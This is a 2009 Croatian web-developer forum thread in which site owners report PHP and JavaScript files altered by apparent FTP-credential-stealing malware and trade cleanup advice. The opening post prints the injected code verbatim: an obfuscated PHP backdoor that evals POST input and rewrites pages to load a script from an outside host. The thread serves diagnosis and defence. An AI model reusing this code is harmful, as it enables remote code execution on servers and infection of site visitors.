Forum FAQForum FAQSearchSearch MemberlistMemberlist Forum ignore listForum ignore list RegisterRegister ProfileProfile Log in to check your private messagesLog in to check your private messages Log inLog in
Izmjenjeni fileovi-hakerski napad

 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Server-side
View previous topic :: View next topic  
Author Message
LifeCanBeFun



Joined: 28 Apr 2006
Posts: 228
Location: Istra

PostPosted: 16.04.2009 22:41    Post subject: Izmjenjeni fileovi-hakerski napad Add user to your forum ignore list Reply with quote

Danas sam slučajno primjetio da mi se na index.php fileu jednog weba na vrh dodao slijedeći kod

Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',
base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3
VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY2xOQnJpcHRrMVMlMjBzcmNCdyUzRCU
yRkhoZiUyRmxOQjk0JTJFMjRJYzclMkVlbzIlMkUxOUhoZjVadVIlMkZxTTJqcXVlcnlsTkIlMk
VqcU0yc2syJTNFJTNDWnVSJTJGSGhmc2NCd3JpcHQlM0UnKS5yZXBsYWNlKC9Cd3x
JY3xadVJ8ZW98azJ8SGhmfGsxU3xsTkJ8cU0yfGNpL2csIiIpKTsKIC0tPjwvc2NyaXB0
Pg=='));function tmp_lkojfghx($s){if($g=substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#
<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,)
{20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||
($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script
language=javascript><!-- \ndocument\.write\(unescape\(.+?\n
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#
(\s*<body)#mi',TMP_XHGFJOKL.'
\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i]
[0]);echo $s[$i]
[1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp_lkojfghx2(); ?>



nije mi bilo jasno pa sam otiša pogledati dalje i vidim da je na svim webovima u paketu (nekih 10-ak) isto... 15.4. oko 19 sati izmjenjeni su vecinom index, login, functions, js-ovi i slicni fileovi..
zovemo avalon i oni kazu da ce vratiti backup od prije dva dana al mislim da bi se ista stvar mogla ponoviti...


trazio sam po forumima al svi govore drugu stvar... neki da je stvar do hostinga, neki da je problem u spyware koji krade lozinke...

ovo je inace hostano na avalonu...

da li mozda netko imao slican problem?

_________________
www.netlex.hr
Back to top
View user's profile Send private message Visit poster's website Twitter profile
studioinvent



Joined: 09 Sep 2008
Posts: 9

PostPosted: 16.04.2009 22:52    Post subject: Add user to your forum ignore list Reply with quote

backup će ti rješiti stvari trenutno ali ne zadugo.... to su ti spyware-i koji crawaju site i traže propuste u security-u...

kad tad će se to opet desit ako ne pronađeš gdje je bio propust i ispraviš ga...

propust ti može biti u lošoj lozinki CMS-a pa kroz FCK editor uploadaju neku glupost...
možda ti je ftp lozinka neka week... ovisi... treba pogledat logove na serveru...
Back to top
View user's profile Send private message
fakz



Joined: 08 Sep 2003
Posts: 384
Location: Rijeka

PostPosted: 17.04.2009 09:32    Post subject: Add user to your forum ignore list Reply with quote

Svakako prvo promijeni pass za FTP (ili -ove), a onda prodji svoj komp sa nekim antivirusom, da eliminiras mogucnost da ti je neki trojan ukrao ftp podatke. A onda tek provjeri propuste u kodu ...

_________________
"It is through the hottest fires comes the hardest steel"
Conan the Barbarian
Back to top
View user's profile Send private message Visit poster's website
/dev/null



Joined: 22 Dec 2004
Posts: 144

PostPosted: 18.04.2009 09:08    Post subject: Add user to your forum ignore list Reply with quote

ajoj to je neki dosadni spyware koji ocito snifa FTP saobracaj i dodaje odredjeni code u PHP (vjerovatno samo ako je transfer type ASCII). E sad da stvar bude bolja, taj PHP code edituje odredjene HTML i JS fajlove i ubacuje takodje code. Taj code opet kontaktira preko JSa neke stranice u pizdi maternoj i poskusava da iskoristi neki propust u browserima i zarazi jos vise racunara. Zarazena stranica koliko sam primjetio ubije FF na windowsima, a na linuxu nista, koda ga i nema. Za IE neam pojma.

Uglavnom, taj jebeni crv je toliko smoran da je to bruka. Men je umro komp nekidan i ja sam uzo prvi u firmi koji nije nist radio i nastavio da radim. Trebam li reci da je taj komp piciio na windowsu i da je bio prepun smeca. To govno crvavo mi je zarazilo 5 projekata (zivih online) i jedno 500 raznih fajlova koje sam moro pjeske popravljat. Izgubio sam citav jebeni radni dan zbog njega. Mjenja sve *funcion*, *conf*, *index* etc .php fajlove, sve *index* html fajlove i ne znam kako bira *js fajlove, al mislim da ih je bilo more zarazenih.

Et, toliko.
Back to top
View user's profile Send private message
Tristan



Joined: 01 Aug 2006
Posts: 614
Location: Under the sky

PostPosted: 18.04.2009 12:28    Post subject: Add user to your forum ignore list Reply with quote

I nama su također siteovi bili napadnuti, nakon čega sam provjeravao permissione i shvatio da nije u njima problem. Kasnije su javili sa servera i poslali nam logove, radi se o promjeni fileova putem ftp-a.

_________________
Carpe diem...
Back to top
View user's profile Send private message Visit poster's website
LifeCanBeFun



Joined: 28 Apr 2006
Posts: 228
Location: Istra

PostPosted: 18.04.2009 21:17    Post subject: Add user to your forum ignore list Reply with quote

evo nakon 2 dana gotovo svi webovi koje na kojima sam radio su zaraženi... Crying or Very sad
problema ne fali... promjenio sam sve moguće passworde, imam hrpu papirića, ne želim passove u komp pisat, stalno zovemo plus i avalon za backup...
trenutno radim na starom kompu i pripremamo se na formatiranje radnog... inace imam nod32, spybot, ad aware... al nis nisu pomogli...

a sto je najgore opet necu biti siguran ce to rjesiti problem kad reinstaliram masinu...

simptomi su isti kao kod /dev/null-a

@/dev/null

Kako si rješio problem? Formatirao komp ili ga bacio kroz prozor? Rolling Eyes Confused

_________________
www.netlex.hr
Back to top
View user's profile Send private message Visit poster's website Twitter profile
Adrian



Joined: 02 Apr 2004
Posts: 692
Location: Around & about

PostPosted: 18.04.2009 21:31    Post subject: Add user to your forum ignore list Reply with quote

Iz mog iskustva, vjerojatno je nečiji privatni komp zaražen, trojan pokupi passove za ftp i mjenja datoteke.

Prva preporuka - Kaspersky.

Nedavno je jedan od mojih kolega dobio virus na xp koji mu je mjenjao sve server side izvršive datoteke na kompu, milijon toga je zarazio pa je morao formatirati komp. Iako nije isti ovaj virus, sličan je, no nod ga nije skužio uopće. Navodno ga jedino Kaspersky vidi, al ga isto ne zna očistit.

Druga preporuka - kad ste isformatirali kompove, pregledali i sve to, onda promjeniti sve lozinke za accounte.

Treća preporuka - Mac ili Linux. Smile

_________________
The quest for certainty blocks the search for meaning. Uncertainty is the very condition to impel a man to unfold his powers.
http://origami.hr
Back to top
View user's profile Send private message Visit poster's website
vtonline



Joined: 06 Apr 2008
Posts: 13

PostPosted: 19.04.2009 12:05    Post subject: Add user to your forum ignore list Reply with quote

Kod nas je 30 sitova zaraženo. Riječ je o ubacivanju iframe-a u index (php i html) i home filove po svim mapama.

Sitove hostamo kod Fiuhosta, Plusa i Hosting centra. Ekipa Fiuhosta je jučer zajedno s nama cijelo popodne pa sve do sitnih jutarnjih sati spašavala stvar. Stvarno, dečkima svaka čast. Iframove su čistili i ručno i backupovima.

Na Hosting centru među ostalima hostamo regionalni portal Virovitica.info čiji je kod izmasakriran. Ima nekoliko stotina zaraženih filova. Backup na žalost ne možemo napraviti jer hosting provider ima backup tek od siječnja. Ja jednostavno ne mogu vjerovati! Da li i ostali provideri ne rade redovite backupove?
Back to top
View user's profile Send private message
LifeCanBeFun



Joined: 28 Apr 2006
Posts: 228
Location: Istra

PostPosted: 19.04.2009 13:04    Post subject: Add user to your forum ignore list Reply with quote

Mi nemamo slučaj s iframeovima ali isto slično..

http://blog.plus.hr/2009/04/16/iframe-attacks/

Na blogu od plusa je lijepo objašnjeno.


@Adrian

Da li se možda zna naziv tog trojana? Dal postoji neki removal?

_________________
www.netlex.hr
Back to top
View user's profile Send private message Visit poster's website Twitter profile
ska



Joined: 07 Oct 2003
Posts: 402

PostPosted: 19.04.2009 13:08    Post subject: Add user to your forum ignore list Reply with quote

Nažalost, nisu samo virusi problem u svakodnevnom radu... ima tu udara struje, redovnog crkavanja opreme, krađe i sl. bez obzira na opremu i OS.
Teško je biti pametan kada se takvo što desi... zato treba biti pametniji prije toga...

_________________
ska
Back to top
View user's profile Send private message
Adrian



Joined: 02 Apr 2004
Posts: 692
Location: Around & about

PostPosted: 19.04.2009 17:40    Post subject: Add user to your forum ignore list Reply with quote

Nažalost, mi nismo uspjeli naći nikakvo ime...

_________________
The quest for certainty blocks the search for meaning. Uncertainty is the very condition to impel a man to unfold his powers.
http://origami.hr
Back to top
View user's profile Send private message Visit poster's website
/dev/null



Joined: 22 Dec 2004
Posts: 144

PostPosted: 21.04.2009 07:18    Post subject: Add user to your forum ignore list Reply with quote

Baci sam komp kroz prozor i formatiro ga :}

Rjesio sam tako sto sam sino sorsove projekata na HDD, koristeci pretrage fajlova u projektu skino sav los JS,PHP,HTML code.
Komp koji je bio zarazen nije moj, neg sam ga koristio "samo da se posluzim", dok je moj na servisu - i stvarno mi je pravo dobro posluzio.
Back to top
View user's profile Send private message
Display posts from previous:   
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    mi3dot.org Forum Index -> Server-side All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group